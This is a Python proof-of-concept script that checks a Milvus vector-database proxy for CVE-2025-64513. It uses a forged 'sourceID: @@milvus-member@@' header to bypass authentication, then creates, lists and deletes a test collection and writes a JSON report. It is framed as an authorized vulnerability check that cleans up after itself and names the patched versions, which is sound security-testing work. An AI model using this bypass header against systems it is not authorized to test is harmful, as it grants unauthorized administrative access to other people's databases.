#!/usr/bin/env python3
# ==============================================
# CVE-2025-64513 Responsible Test PoC + Report
# Author: Blackash "B1ack4sh"
# Target: Milvus Proxy (http://host:19530)
# ==============================================
"""Check a Milvus proxy for CVE-2025-64513 and write a JSON report.

The check is deliberately minimal: it reads the server version, creates one
uniquely named, empty test collection, confirms that the collection is
listed, and then deletes it again.  Every step is recorded in ``REPORT`` and
the report is saved as ``report_cve_2025_64513_<TEST_ID>.json`` in the
current working directory.

Run this only against systems you own or are explicitly authorized to test.

Usage:
    python3 poc_cve_2025_64513.py http://milvus-host:19530
"""

import base64
import datetime
import json
import random
import string
import sys
from typing import Optional

import requests
import urllib3

# Certificate verification is off by default (VERIFY_SSL below), so silence
# the warning urllib3 would otherwise print for every request.
urllib3.disable_warnings()

# === CONFIG ===
URL = ""  # ← SET YOUR TARGET: http://milvus-proxy:19530
VERIFY_SSL = False
TIMEOUT = 10

# Generate unique test name so repeated runs never collide with each other
# or with real collections on the target.
TEST_ID = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
COLLECTION_NAME = f"cve_2025_64513_test_{TEST_ID}"

# Headers for bypass
BYPASS_HEADER = {"sourceID": "@@milvus-member@@", "Content-Type": "application/json"}

# Failures a single step is expected to run into: transport/HTTP-level errors,
# a body that is not JSON (ValueError), or JSON with an unexpected shape.
# Anything else is a programming error and is allowed to propagate.
_STEP_ERRORS = (
    requests.RequestException,
    ValueError,
    KeyError,
    TypeError,
    AttributeError,
)

# Report storage
REPORT = {
    "cve": "CVE-2025-64513",
    # Timezone-aware "now" (utcnow() is deprecated); rendered with the same
    # trailing "Z" the report format has always used.
    "timestamp": datetime.datetime.now(datetime.timezone.utc)
    .isoformat()
    .replace("+00:00", "Z"),
    "target": URL,
    "test_collection": COLLECTION_NAME,
    "steps": [],
    "vulnerable": False,
    "proof": {},
    "cleanup": False,
}


def log_step(step, result=None):
    """Append a step and its outcome to ``REPORT["steps"]`` and print it.

    Args:
        step: Short human-readable name of the step.
        result: Outcome text for the step (``None`` if there is none).
    """
    entry = {"step": step, "result": result}
    REPORT["steps"].append(entry)
    print(f"[*] {step} → {result}")


def save_report():
    """Write ``REPORT`` as indented JSON to a file named after ``TEST_ID``."""
    filename = f"report_cve_2025_64513_{TEST_ID}.json"
    # Explicit encoding so the report does not depend on the platform default.
    with open(filename, "w", encoding="utf-8") as f:
        json.dump(REPORT, f, indent=2)
    print(f"\nREPORT SAVED: {filename}\n")


# === STEP 1: Check Version (Read-Only) ===
def check_version() -> Optional[str]:
    """Request the server version from ``URL``.

    Returns:
        The ``version`` field of the JSON response (``"unknown"`` when the
        field is absent), or ``None`` if the request fails, returns a
        non-200 status, or the body cannot be parsed.
    """
    try:
        resp = requests.get(
            f"{URL}/api/v1/version",
            headers=BYPASS_HEADER,
            verify=VERIFY_SSL,
            timeout=TIMEOUT,
        )
        if resp.status_code != 200:
            log_step("Version Check", f"Failed (HTTP {resp.status_code})")
            return None
        version = resp.json().get("version", "unknown")
    except _STEP_ERRORS as e:
        log_step("Version Check", f"Error: {e}")
        return None
    log_step("Version Check", f"Success (v{version})")
    return version


# === STEP 2: Create Test Collection ===
def create_test_collection() -> bool:
    """Try to create the empty test collection ``COLLECTION_NAME``.

    On success, ``REPORT["proof"]["collection_created"]`` is set to ``True``.

    Returns:
        ``True`` if the server answered HTTP 200, ``False`` otherwise
        (including on request errors).
    """
    payload = {
        "collection_name": COLLECTION_NAME,
        "schema": {
            "fields": [
                {"name": "id", "type": "Int64", "is_primary_key": True},
                {"name": "vector", "type": "FloatVector", "params": {"dim": 8}},
            ]
        },
    }
    try:
        resp = requests.post(
            f"{URL}/api/v1/collections",
            json=payload,
            headers=BYPASS_HEADER,
            verify=VERIFY_SSL,
            timeout=TIMEOUT,
        )
    except _STEP_ERRORS as e:
        log_step("Create Test Collection", f"Error: {e}")
        return False
    if resp.status_code != 200:
        log_step("Create Test Collection", f"Failed: {resp.text}")
        return False
    log_step("Create Test Collection", f"Success: {COLLECTION_NAME}")
    REPORT["proof"]["collection_created"] = True
    return True


# === STEP 3: Verify Collection Exists ===
def verify_collection() -> bool:
    """Check whether ``COLLECTION_NAME`` appears in the collection listing.

    Returns:
        ``True`` if the listing request returns HTTP 200 and contains the
        test collection, ``False`` otherwise (including on request or
        parsing errors).
    """
    try:
        resp = requests.get(
            f"{URL}/api/v1/collections",
            headers=BYPASS_HEADER,
            verify=VERIFY_SSL,
            timeout=TIMEOUT,
        )
        if resp.status_code == 200:
            collections = [
                c["collection_name"] for c in resp.json().get("collections", [])
            ]
            if COLLECTION_NAME in collections:
                log_step("Verify Collection", f"Found: {COLLECTION_NAME}")
                return True
    except _STEP_ERRORS as e:
        log_step("Verify Collection", f"Error: {e}")
        return False
    log_step("Verify Collection", "Not found")
    return False


# === STEP 4: Clean Up ===
def delete_collection() -> bool:
    """Delete the test collection and record the outcome.

    On success, ``REPORT["cleanup"]`` is set to ``True``.

    Returns:
        ``True`` if the server answered HTTP 200, ``False`` otherwise
        (including on request errors).
    """
    try:
        resp = requests.delete(
            f"{URL}/api/v1/collections/{COLLECTION_NAME}",
            headers=BYPASS_HEADER,
            verify=VERIFY_SSL,
            timeout=TIMEOUT,
        )
    except _STEP_ERRORS as e:
        log_step("Cleanup", f"Error: {e}")
        return False
    if resp.status_code != 200:
        log_step("Cleanup", f"Failed: {resp.text}")
        return False
    log_step("Cleanup", f"Deleted: {COLLECTION_NAME}")
    REPORT["cleanup"] = True
    return True


# === MAIN ===
def main(argv) -> int:
    """Run all steps against the target given in ``argv[1]``.

    Args:
        argv: Command-line vector; exactly one argument (the base URL) is
            expected after the program name.

    Returns:
        Process exit code: ``1`` for a usage error or a failed version
        check, ``0`` once the run completes and the report is saved.
    """
    global URL

    if len(argv) != 2:
        print("Usage: python3 poc_cve_2025_64513.py http://milvus-host:19530")
        return 1

    URL = argv[1].rstrip("/")
    REPORT["target"] = URL

    print(f"\nTARGET: {URL}")
    print(f"TEST COLLECTION: {COLLECTION_NAME}\n")

    version = check_version()
    if not version:
        print("Version check failed. Likely not vulnerable or unreachable.")
        save_report()
        return 1

    created = create_test_collection()
    try:
        verified = verify_collection() if created else False
        REPORT["vulnerable"] = created and verified
        REPORT["proof"]["version"] = version
    finally:
        # Cleanup runs even if verification is interrupted (e.g. Ctrl-C), so
        # the test collection is not left behind on the target.
        if created:
            delete_collection()
        else:
            print("Skipping cleanup (nothing created)")

    # Final Verdict
    print("\n" + "=" * 50)
    if REPORT["vulnerable"]:
        print("VULNERABLE TO CVE-2025-64513")
        print("Upgrade to 2.4.24 / 2.5.21 / 2.6.5 IMMEDIATELY!")
    else:
        print("NOT VULNERABLE (or already patched)")
    print("=" * 50)

    save_report()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))